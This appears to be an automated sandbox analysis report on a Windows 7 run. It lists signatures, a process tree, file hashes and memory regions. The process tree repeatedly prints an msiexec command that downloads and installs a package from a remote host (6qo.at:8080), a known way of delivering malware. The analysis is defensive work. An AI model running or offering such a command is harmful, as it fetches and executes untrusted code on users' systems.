Analysis

  • max time kernel
    228s
  • max time network
    193s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2022 17:08

General

  • Target

    http://mSieXEC.exe-fv"HTTp://6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir"

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://mSieXEC.exe-fv"HTTp://6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:952
  • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe" -fv http//6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:636
    • C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe" http//6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir
      2⤵
        PID:1560
      • C:\Windows\system32\msiexec.exe
        "C:\Windows\system32\msiexec.exe" -fV http//6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1832
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1596
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x0
      1⤵
        PID:1628
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x488
        1⤵
          PID:1600

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FFD0HR85.txt

          Filesize

          608B

          MD5

          1609f731867ff58ca201880990fe5907

          SHA1

          65af708f4f33e0fbd7988a459d77fb6edb07cd09

          SHA256

          65f1f276ce5146d6c988f69b0c2f3575f9c44d77d94c597e8891640a85627f69

          SHA512

          a80a239c4751a27b40f1f441d806593cedcf640be1095ab7497af0f7e1917a9a14b689eb19b9d51650a11f8edf18b10be2fa92604ec7ed36167e3343624c4496

        • memory/636-65-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

          Filesize

          8KB

        • memory/1384-57-0x000007FEEE310000-0x000007FEEE7D0000-memory.dmp

          Filesize

          4.8MB

        • memory/1384-58-0x000007FEED340000-0x000007FEEE30A000-memory.dmp

          Filesize

          15.8MB

        • memory/1384-59-0x000007FEEC0E0000-0x000007FEED333000-memory.dmp

          Filesize

          18.3MB

        • memory/1384-60-0x000000001D750000-0x000000001DA4F000-memory.dmp

          Filesize

          3.0MB

        • memory/1384-61-0x00000000024A6000-0x00000000024C5000-memory.dmp

          Filesize

          124KB

        • memory/1384-62-0x00000000024A6000-0x00000000024C5000-memory.dmp

          Filesize

          124KB

        • memory/1384-54-0x000007FEF3180000-0x000007FEF3BA3000-memory.dmp

          Filesize

          10.1MB

        • memory/1384-56-0x000007FEEE7D0000-0x000007FEEF866000-memory.dmp

          Filesize

          16.6MB

        • memory/1384-55-0x000007FEF2620000-0x000007FEF317D000-memory.dmp

          Filesize

          11.4MB

        • memory/1384-72-0x00000000024A6000-0x00000000024C5000-memory.dmp

          Filesize

          124KB